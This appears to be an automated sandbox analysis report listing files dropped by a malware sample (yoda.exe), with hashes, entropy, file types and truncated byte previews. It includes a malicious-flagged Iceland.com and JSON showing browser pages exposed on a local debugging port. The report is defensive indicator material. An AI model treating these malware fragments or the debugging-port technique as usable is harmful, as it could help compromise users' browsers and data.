t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.+.F.G.A.J.W.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\json[1].json

Download File

Process:	C:\Users\user\AppData\Local\Temp\314782\Iceland.com
File Type:	JSON data
Category:	dropped
Size (bytes):	3500
Entropy (8bit):	5.395441013913045
Encrypted:	false
SSDEEP:	96:6NnCUZzHCUENnCwbCaNnClmAs9ClvNnCYnWdgECYmNnCsC3NnCmZDCmINnCswCrV:6NvZjENbNKmAdvNTnW1mNYNLKNF5Nr
MD5:	9612DA4AAD0F104943367CCDD5744AE3
SHA1:	B3A4E50A58E3EEB4B2DC74E9C98D4044D8DAF71E
SHA-256:	7F4620999F8DCF0AABD27F2A29D5063C82764507F143459F0FCB0BDD4A6B897B
SHA-512:	E4BBC35536387E9F406BE75A019E9EDBEF8ACC86B9B9FFF7F2A2D535A9DD313837E6087AC2551C0617D141E71191540E7A7042A32B3B3947E2005FAB20CA6352
Malicious:	false
Preview:	[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/C2198D0ACEB0C07EBBA92B4374D1EDE8",.. "id": "C2198D0ACEB0C07EBBA92B4374D1EDE8",.. "title": "Microsoft Voices",.. "type": "background_page",.. "url": "chrome-extension://jdiccldimpdaibmpdkjnbmckianbfold/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/C2198D0ACEB0C07EBBA92B4374D1EDE8"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/A7B62984964E33A27EE4092E6813EDF7",.. "id": "A7B62984964E33A27EE4092E6813EDF7",.. "title": "WebRTC Internals Extension",.. "type": "background_page",.. "url": "chrome-extension://ncbjelpjchkpbikbpkcchkhkblodoama/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/A7B62984964E33A27EE4092E6813EDF7"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\json[1].json

Download File

Process:	C:\Users\user\AppData\Local\Temp\314782\Iceland.com
File Type:	JSON data
Category:	dropped
Size (bytes):	1787
Entropy (8bit):	5.356472921629534
Encrypted:	false
SSDEEP:	48:SfNaoCBTECyfNaoC6KfKNC6xfNaoC16OC1+fNaoCtQ0UrU0U8Co:6NnCBTECaNnClCNCSNnC16OC1mNnCtQB
MD5:	2D07AA3945CCCD62E8B388CA2E0619D0
SHA1:	3EC4BA2F82C04C157619271781715FED881D9AD0
SHA-256:	172CD46762CD2AB498E158929CDC9FE437EA02A55626543E863E62ABFA18F32C
SHA-512:	DAC6BB890530E0B79D1E3BB046A3D7E762ABF4A2746CF1792CD07D537CDDD9C51FE4A7AC08BBF3A5FBCAF8D8C2DD4AEF081CF464F2A4916240DD8FA07743B8A5
Malicious:	false
Preview:	[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/DFB177F777ABBE15AF9EDEE1DF3D9827",.. "id": "DFB177F777ABBE15AF9EDEE1DF3D9827",.. "title": "Google Network Speech",.. "type": "background_page",.. "url": "chrome-extension://neajdppkdcdipfabeoofebfddakdcjhd/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/DFB177F777ABBE15AF9EDEE1DF3D9827"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/325C2589ED9E099F13708C9EE230DC64",.. "id": "325C2589ED9E099F13708C9EE230DC64",.. "title": "Google Hangouts",.. "type": "background_page",.. "url": "chrome-extension://nkeimhogjdpnpccoofpliimaahmaaome/background.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/325C2589ED9E099F13708C9EE230DC64"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtoo

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\050cf0a6-9733-465b-85ad-44c443d7b6de.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1366x720, components 3
Category:	dropped
Size (bytes):	31335
Entropy (8bit):	7.694019108205432
Encrypted:	false
SSDEEP:	768:514ugFV0910SWyR5kNVdS3sNp/xm3MbiMuYEDlyFUyv6E/ty8:5WcDWyRKNVd2M/IxMuYEDlymsTQ8
MD5:	6B72597205C77D3E40E1A35BEE403801
SHA1:	6BECEE055C6E057AF9475B6D651B4EE561D02F20
SHA-256:	C899297FBDFC88C1634B1145A087FDB5BE17172FD786C078B299557B22F06DEB
SHA-512:	7CB1A98E0C7FBB349D9CB681233A9F4ED22A1C3FAADCDF1BC270B04BD97D3FC41AB6F762B2F5F231281D63D96AC3D243640BA81D5E8CCD9F54486B4F538CA8B4
Malicious:	false
Preview:	......Exif..II.................Ducky.......2......Adobe.d...........................................................#"""#''''''''''..................................................!! !!''''''''''........V.."....................................................................................!1..AQ..aq."2....R..T....Br.#S.U..b..3Cs...t6.c.$D.5uV...4d.E&....%F......................!1..AQaq....."2......BRbr3CS....#..4.............?......1f.n..T......TP....E...........P.....@.........E..@......E.P........@........E.....P.P..A@@.E..@.P.P..AP.P..AP..@....T..AP.E..P.Z .. ....."... .....7.H...w.....t.....T....M.."... P..n.n..t5..B.P..(......................................( .................... .".... .".......(.. ."....... ....o......E.6... ....."........."J......Ah......@.@@....:@{6..wCp..3...((.(.........................@..(...."............................ ........T.......@.@@........AP.P..@.E@....E@.d.E@.@@..@.P.T..@..@..P.D...@M........EO..."...=.wCp.....R......P.@......

C:\Users\user\AppData\Local\Temp\2eeb18a7-3251-4c2c-9394-add962ce0e1f.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Google Chrome extension, version 3
Category:	dropped
Size (bytes):	154477
Entropy (8bit):	7.835886983924039
Encrypted:	false
SSDEEP:	3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
MD5:	14937B985303ECCE4196154A24FC369A
SHA1:	ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
SHA-256:	71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
SHA-512:	1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
Malicious:	false
Preview:	Cr24..............0.."0....H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.qBa/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.\|.X.M..u..s[...?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........%0............G.m.}...CG.....a.s.:.S..QiI.fT.k.MdOF.2....D...v`m...M.7'.R.d...8....2..~.<w8!.W..Sg.._A6.(.pC..w.=..!..7h!J...].....3......Kf..k...\|....6./.p.....A....e.1.y.<~Mu..+(v8W........?=.V+.Gb&...u8)...=Qt...... ......x.}.f..&X.SN9e..L....[0Y0....H.=.....H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...G0E.!....~..E...Au.C.q..y.?2An.a..Zn}. H~.vtgI...o.\|.j.e....p.........".&...........Z]o.H..+..zF.......S.E}@.F..".P`...3......jW....H.H...:..8.......<...........Z.e.>..vV.......J.,/.X.....?.%.....6....m#.u].Z...[.s.M_...J.."9l..l...,\|.....r...QC.....4:....wj.O...5....s.n.%.....y....c.....#F........)gv(..!S

C:\Users\user\AppData\Local\Temp\314782\A

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	COM executable for DOS
Category:	dropped
Size (bytes):	280253
Entropy (8bit):	7.999290755493679
Encrypted:	true
SSDEEP:	6144:KvIP512rv/OaxzhAHzb+o/p0lENGXQVPu:C616/OVLWlEN8QNu
MD5:	DCB63E0DAA1F10E37B1765C94317E960
SHA1:	ABA56DDB75B5BE0CC9F6DD8781EBD352A78464FD
SHA-256:	4AE6452A70EB3664BB35656040EB4E54DF016F1FCB5F1D31169F84AB854C9157
SHA-512:	C07784B006E45FC36A5C6A95F2866FB514946744CAB72825C017DB972BEF2DA33123D2FE99FE61BF126E84D17020EC492AF2B92F884F35C2F4B3BEC81507F458
Malicious:	false
Joe Sandbox View:	Filename: yoda.exe, Detection: malicious, Browse
Preview:	..^...Q.._n.D.+\.ua._$...b..F......_.M."............Y...~ld.....Q....>.VD...}.GX...Z.....f.B:.P.+.6.SCd..........u\|H4......)...y=-..`n.T,.Z...e.%.O....b.z5;)..5...u.p'.A.!yo.B..W)4n ........$.,.NkvT'.}...X..w.j...E..w...w.sU..u=...G.dR.N.+.HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.H....2)...<.9.m....&...4....R~...0.8.'.F...h..............R...\Y..R...\Y.kC.R......%x....}...q..U-...(....%....V..?p.hf..........@.#....{'.l..v..*)~.K....dC`:.......c!.).A.&!0..~..}..h..w14.h.%.!4.A...V..+}.,{{.s.x..K....V.E...`.[..r....R..,P..Myn.2..t.W....j..........&.R....T..R...\Y.m........r..5...x..2).U.j....R>.l#.~...........h...\|.@=.h....jX.4s)<.G...u...'......]q...WQ......L.a.$g...]..e.(.x .}.c..T2.x..%.B.'.r.....<...i..7J.K...7^ .SSX.s..E9-..O..-...V=.C.(x..k.^.....B....^.p5..Z.4p"5.@..t%..YN......jT...2..P(4.{\|.?>\|...

C:\Users\user\AppData\Local\Temp\314782\Iceland.com

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	947288
Entropy (8bit):	6.630612696399572
Encrypted:	false
SSDEEP:	24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
MD5:	62D09F076E6E0240548C2F837536A46A
SHA1:	26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
SHA-256:	1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
SHA-512:	32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: yoda.exe, Detection: malicious, Browse Filename: lem.exe, Detection: malicious, Browse Filename: script.ps1, Detection: malicious, Browse Filename: installer_1.05_36.4.zip, Detection: malicious, Browse Filename: Set-up.exe, Detection: malicious, Browse Filename: Set-up.exe, Detection: malicious, Browse Filename: PodcastsTries.exe, Detection: malicious, Browse Filename: vce exam simulator 2.2.1 crackk.exe, Detection: malicious, Browse Filename: LVDdWBGnVE.exe, Detection: malicious, Browse Filename: eMBO6wS1b5.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................\|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\7ccf8629-d600-479d-935b-c4e4c1e13334.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Google Chrome extension, version 3
Category:	dropped
Size (bytes):	11185
Entropy (8bit):	7.951995436832936
Encrypted:	false
SSDEEP:	192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
MD5:	78E47DDA17341BED7BE45DCCFD89AC87
SHA1:	1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
SHA-256:	67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
SHA-512:	9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
Malicious:	false
Preview:	Cr24..............0.."0....H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0....H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

C:\Users\user\AppData\Local\Temp\8170d7f2-f04a-4b8d-a02d-42a4caf5c4dd.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	PNG image data, 50 x 50, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	103855
Entropy (8bit):	7.924096864897051
Encrypted:	false
SSDEEP:	3072:LaM/iGyQVUdJpABfSi77IbHZ0PmFKY5z/M7tz:LriGyQVUd0Bf77cZP7qt
MD5:	A63920BB79F69C9AC589A32A2F727835
SHA1:	A9C9B90288C67A332C7B9272EA483C33BD104490
SHA-256:	41AC76F5CBC80C8C2EF632FB889097088CD703E2E307FDD7C126099A37B16B9B
SHA-512:	FFC51BDBCA2BC8C494EE4B2DFC385F18A84A7BDCDA9B2CAFA506AD6BA2556AF44B17B6CA75A0A053BD4425220C412F909F092B94C941D3673E878C741BD9010F
Malicious:	false
Preview:	.PNG........IHDR...2...2......?......gAMA......a.....pHYs...........k.....iTXtXML:com.adobe.xmp.....<?xpacket begin='.' id='W5M0MpCehiHzreSzNTczkc9d'?>..<x:xmpmeta xmlns:x="adobe:ns:meta/"><rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"><rdf:Description rdf:about="uuid:faf5bdd5-ba3d-11da-ad31-d33d75182f1b" xmlns:tiff="http://ns.adobe.com/tiff/1.0/"><tiff:Orientation>1</tiff:Orientation></rdf:Description></rdf:RDF></x:xmpmeta>..<?xpacket end='w'?>,.......IDAThC.Io#Iz.....L&W.Z(j.*U..l_.Kl.a``......0.1...G.?a.d.in...x..J..E...L.1.Lj+..U.....Tf,o..E\|oD......-.]S.-Tb.a..A...M.;..M.ea..!.X.n......?..<0....4IU.$......h..fh.8M. <..#f?../.J.U.(W.........aq?.....T.q....N4w.b.7?....84[{-v..R..... .Cd-Rw....o{.....K"q....!\^.v/..`........;;O..'..sA....`..D.V..". .......\.D...( .`>......N...e[L..O....=2.>}...}..P....#".....,...w.w.H>"A..>t.Q....O._....M.........R.5....oO........$.......^.gm..X6XV.<.}!H4.z.m...PJ}...F.XNM.P.i6+\|.U...8..B\|? .#.4}...#M

C:\Users\user\AppData\Local\Temp\87aa5725-8f7b-4a2e-98db-8319c53f44c6.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:L:L
MD5:	5058F1AF8388633F609CADB75A75DC9D
SHA1:	3A52CE780950D4D969792A2559CD519D7EE8C727
SHA-256:	CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
SHA-512:	0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
Malicious:	false
Preview:	.

C:\Users\user\AppData\Local\Temp\Begun

Download File

Process:	C:\Users\user\AppData\Local\Temp\yoda.exe
File Type:	data
Category:	dropped
Size (bytes):	100352
Entropy (8bit):	6.2446902061366485
Encrypted:	false
SSDEEP:	3072:Cg5PXPeiR6MKkjGWoUlJUPdgQa8Bp/LxyA3Y:V5vPeDkjGgQaE/Y
MD5:	1B4522B95D81397CA5A2210553445BBF
SHA1:	9A91B54BE1C358C2EFE36119DA1A9A866C68379D
SHA-256:	1BAC82F93DD185119FFF14EC929D0B9F6AF549985B6B76263F582EA79AC73EA8
SHA-512:	E289FD7F59A35C1D94090A971463AA8F0B45CB24D29700D5B13BC564FC175235DE22E448C578BAC44E5FF114D89D0650455AD2A1BF669998776B306D0284508F
Malicious:	false
Preview:	8.u..<)M...........U..E.VW.@......P......u..........>3._.F.....^]...U......`.D$.V.u.WP.D$.PV..............L$..@)M..T$..L$........T)M..L$.....8.\|$..............'........P............H..............a...WQ.P....7..<.I..t$...D.........d.........h.........P........D$.;F.t.P.....3.@_^..]....L$..N...3...U..V.u.;5t)M.........T)M........t.Q......T)M..... ...`)M...T)M.;5d)M.u....\|.....8.u.N...5d)M...X)M.^...v..D...8.t.]...I..X)M.j..4......T)M.YY..X)M..$....X)M....v..T)M...x)M....t)M...T...V..Np......NT....N$....N....h....V.C...YY..^...U..VW.}.........M...tF.E.S..t.;.....uH.^.....Q.........;...a...........h....V......E.YY..t.[j.j..7..X.I._^].....u.........M...t...6..V..j..N..V..F..4......F.YY.N.^.$...SVW..j._..l...............u.Nl.....N(...h....V.U...YY_..^[...U...u...(M......U...t...@)M.......y..u&...)M...u...M.........Qj..u...x.I.].....)M...U...u...(M..H.....@)M.......q.P.....j..u.j..u...x.I.]...U..M....t.W.}.........._]...V..4.I...(M.P..........t...@)M...j.....0

C:\Users\user\AppData\Local\Temp\Cab

Download File

Process:	C:\Users\user\AppData\Local\Temp\yoda.exe
File Type:	data
Category:	dropped
Size (bytes):	60416
Entropy (8bit):	6.6948814947574045
Encrypted:	false
SSDEEP:	1536:vkvyNf7Xw2U0pkzUWBh2zGc/xv5mjKu2IwNnPEBiqXv+5:MaW2UDQWf05mjccBiqXvK
MD5:	4268C94743989D2335905A72A7BBDEC4
SHA1:	72171D2F7D0AF48F3DCF54DC12E7A7E52D8D5213
SHA-256:	39B58D7B0D2AA7782A2606F2062EE68445FD285714C81C650FCC3AE27954991B
SHA-512:	0F3A3A13A801EA4EBA0931A1F1188C8F9CF026E439B9FFF8EE568079AF13CF6586BF68878581EB221BD35B33AA51BEDAF6A3C92891AFAD0E8E539FAB5062C683
Malicious:	false
Preview:	..M.........M.........M.........M.....f....M.......M.l.J.....M..2I.....M.........M.........M.........M.....f....M.......M.\.I...(.M.G3I...,.M.......0.M.......4.M.......8.M.....f..<.M.....@.M...I...L.M..3I...P.M.......T.M.......X.M.......\.M.....f..`.M.....d.M...I.hH5M...p.M..3I...t.M.......x.M.......\|.M.........M.....f....M....?f......D5M.;.......Q...hD5M..kf......=D5M....7...hD5M.........f..........U..QQ.E..@....A....tB...t9...........VQQ..$..^...u.......]...F...E.3....F.....^.....)......U..QQ.E..@....A....tB...t9...........VQQ..$.6]...u.......]..F...E.3....F.....^.....)......U....S.].V..W.}.........O...........j._...f9x..}.t~.e...E..e....j.PSW.E.......b.............P..U..\|2...\|2.u\.E.;.t...............E...E...P..w...U..\|2...D2.u0.M..@....E...E....H....j.Yf9H...v..._^[......8.@8..U....S.].3.V.u...M.E.E.W....t.8....M......;.r..}.3.A;.v..<....8......;.r.E.u..E..]..E..E...y.....L..]..E...E..._^[...E..]..E......@..]..E.... K....@..]..}.......Au.........A................Au......

C:\Users\user\AppData\Local\Temp\Comparison

Download File

Process:	C:\Users\user\AppData\Local\Temp\yoda.exe
File Type:	data
Category:	dropped
Size (bytes):	139264
Entropy (8bit):	5.6726042666483805
Encrypted:	false
SSDEEP:	1536:PuVGHj1vtK7h6R8anHsWccd0vtmgMbFuz08QuklMBNIimuzaAwusPR:mq8QLeAg0Fuz08XvBNbjaAtsPR
MD5:	D696BFE9F1FFE666DCB77F0E29521543
SHA1:	C9107E51987522C3B19750177BC256196A3D5195
SHA-256:	6F79CAA6B24CB7A63C6D8D4A44BECFB2BEA6442185BB9249128A450C6ABD6DF3
SHA-512:	13C9167962106EBEB9D3823DA689370E82A30D66CF6EC241AEFB35D0D3D68917C42DC5F61CC076FC0AD4557176286E2CD03A030BACA022CF8D40A5C81783278B
Malicious:	false
Preview:	R.O.G.R.E.S.S...G.U.I.C.T.R.L.C.R.E.A.T.E.T.R.E.E.V.I.E.W...G.U.I.C.T.R.L.C.R.E.A.T.E.G.R.A.P.H.I.C.....S.T.R.I.N.G.F.R.O.M.A.S.C.I.I.A.R.R.A.Y.....O.N.A.U.T.O.I.T.E.X.I.T.R.E.G.I.S.T.E.R.....G.U.I.C.T.R.L.C.R.E.A.T.E.T.A.B.I.T.E.M.....G.U.I.C.T.R.L.S.E.T.D.E.F.B.K.C.O.L.O.R.....I.N.I.R.E.A.D.S.E.C.T.I.O.N.N.A.M.E.S...G.U.I.C.T.R.L.C.R.E.A.T.E.B.U.T.T.O.N...D.L.L.C.A.L.L.B.A.C.K.R.E.G.I.S.T.E.R...G.U.I.C.T.R.L.C.R.E.A.T.E.U.P.D.O.W.N...G.U.I.C.T.R.L.C.R.E.A.T.E.S.L.I.D.E.R...S.T.R.I.N.G.R.E.G.E.X.P.R.E.P.L.A.C.E...O.B.J.C.R.E.A.T.E.I.N.T.E.R.F.A.C.E.....G.U.I.C.T.R.L.S.E.N.D.T.O.D.U.M.M.Y.....F.I.L.E.C.R.E.A.T.E.S.H.O.R.T.C.U.T.....G.U.I.C.T.R.L.C.R.E.A.T.E.I.N.P.U.T.....S.O.U.N.D.S.E.T.W.A.V.E.V.O.L.U.M.E.....F.I.L.E.C.R.E.A.T.E.N.T.F.S.L.I.N.K.....G.U.I.S.E.T.A.C.C.E.L.E.R.A.T.O.R.S.....G.U.I.C.T.R.L.C.R.E.A.T.E.C.O.M.B.O.....G.U.I.C.T.R.L.S.E.T.D.E.F.C.O.L.O.R.....P.R.O.C.E.S.S.S.E.T.P.R.I.O.R.I.T.Y.....G.U.I.C.T.R.L.S.E.T.R.E.S.I.Z.I.N.G.....S.T.R.I.N.G.T.O.A.S.C.I.I.A.R.R.A.Y.....

C:\Users\user\AppData\Local\Temp\Dedicated

Download File

Process:	C:\Users\user\AppData\Local\Temp\yoda.exe
File Type:	data
Category:	dropped
Size (bytes):	92160
Entropy (8bit):	4.333762844539525
Encrypted:	false
SSDEEP:	768:rKAGWRqA60dTcR4qYnGfAHE9AUsFxyLtVSQsbZgar3R/OWel3EYr8qc/:rKaj6iTcPAsAhxjgarB/5el3EYr8
MD5:	DB0EC43385F3DEEE406B5415CD6FA773
SHA1:	AB2A645A996DE0A55B9C6923C98843578FD98ACF
SHA-256:	E787120C432605763582DABE1B5EBDF05FE28C6A6A224709B0077CBF14E03EEE
SHA-512:	CBF5E56BCBE7DB45192A7FFAB0CD9BE9C18D21BAA05FD25B2FAC0F9070F104030C47DE4D542A7E79BE6FB3ACFBC5E83F199353DF4E0A705D10A5864FA7731D2B
Malicious:	false
Preview:	............................r.r.r.r.r.r.r.r.r.r.r.r...........................................................................................................................................................................r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.........................r.r.r.r.................................................................................................................r.r.r.r.r.r.r.r.....................r.r.r.r.r.r.................................................................................r.r.r.r.r.r.r.r.............................................................r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r...............................................................................................................................................................................r.r.r.

C:\Users\user\AppData\Local\Temp\Interview

Download File

Process:	C:\Users\user\AppData\Local\Temp\yoda.exe
File Type:	data
Category:	dropped
Size (bytes):	2532
Entropy (8bit):	5.354250764303636
Encrypted:	false
SSDEEP:	48:h9n9mTsCNvEQH5O5U1nPKrhBzM1FoMPhfq1koCqxLVJcd2u+K:LSEA5O5W+MfH5S1CqlVJcIg
MD5:	6B02B5EE03B56BF046BC2774FF57620E
SHA1:	8D6298FC56EBF7EFE5A667D82FD354AE72FF419A
SHA-256:	AAB8F4CF127AD72978835377FF7F04107C766E0445F8DDB1D712D093C143D13A
SHA-512:	606A7E949019032FD25D84E66B52DCF6151C500854F32D384C3F29DD04A9528ED4E71ABBFB793E79C8654DAAB0C3AB910F219C35E17A85D8FD0739AD7FF3C970
Malicious:	false
Preview:	INSPIRED........................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................\|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Iso

Download File

Process:	C:\Users\user\AppData\Local\Temp\yoda.exe
File Type:	data
Category:	dropped
Size (bytes):	84992
Entropy (8bit):	7.997648763107784
Encrypted:	true
SSDEEP:	1536:XxVatTQ6Xytoe88Bu9+ERGvcUU7Jf3hGeHKK8c/S9B/AoHb/+KjD:Xjmxzh3RlRfOcK9B/AoH7+cD
MD5:	0E220B159F97DBBF474BD4ABCBE60B28
SHA1:	86658FB30A15CE54B0DE5FD33B49ABC71C8F036E
SHA-256:	A3CC005EBF0DE6B5FE41FC5504C4B8EEAA7D4A946B57594D56F11DE605914C90
SHA-512:	C9673623ED75B81B6F2C7C72EEC11283F45D935812B6635E351E7D9BEB4A1CED0F23DE9813C65A0E0D7B31B0DD9B6BD94D2ED55D3ED3B0C04704F6F40BB7D1C0
Malicious:	false
Preview:	. .l..E.1......e[Rv....".. ....Q...C.....m.eU..R.....4..'\.`$.\|.z[.O\.......fn..`.~P......5.....v.......".D\|..L.b.(...u.b.3...%.......:....I~..7...... ....G....j[h...f.N.....\...Ml.[Zn.=f?..._a..n..s.t.upcY.Yq.?....,.M.....M.w.C.Z....J.g.....C..$.46q..q..:....0<...J..Q....O.!x..?.A}.vXe.Z...:.\|....K.X..C..P....}I...O.m.n...1./.(.=.k..&Ak..vIo.9.}...?S...o6X7.\|S....h..gW...q8.n...XGS.....$........`/.`..I.....ko.....}.\..LV.En.]!.w..Qu\......zA`-..q..........!........,...jX.%......u.].:.+.......mD.."..hI..F{._Z..30n.tW!.C7..B...Q.Z.UI..~.P.[7...`i..v.....H:...^gh....1.@...b.i.4..:\|.^<.../.b....a1<.s.*..N...V.....r,v.w$?.Hmj.........8........O.n...5......^._k..M.x..^[s..1..~..Q.).D.6...:}......5..y%Ir...t.zt.....<tg...M..w. ..<U.%.:C...].Y>..W5....-]qXB#...?.V...M8/]%..Q..\u.'..).........#.,.z.{Q]1.'..\..b.#....N........~..].....C.f..I..&.M.D.[w..i....T.1...K.q...:..S."]..P...kic..j.C.......j...l.#.. .^z]sY....

C:\Users\user\AppData\Local\Temp\Lately

Download File

Process:	C:\Users\user\AppData\Local\Temp\yoda.exe
File Type:	data
Category:	dropped
Size (bytes):	108544
Entropy (8bit):	6.712735553229447
Encrypted:	false
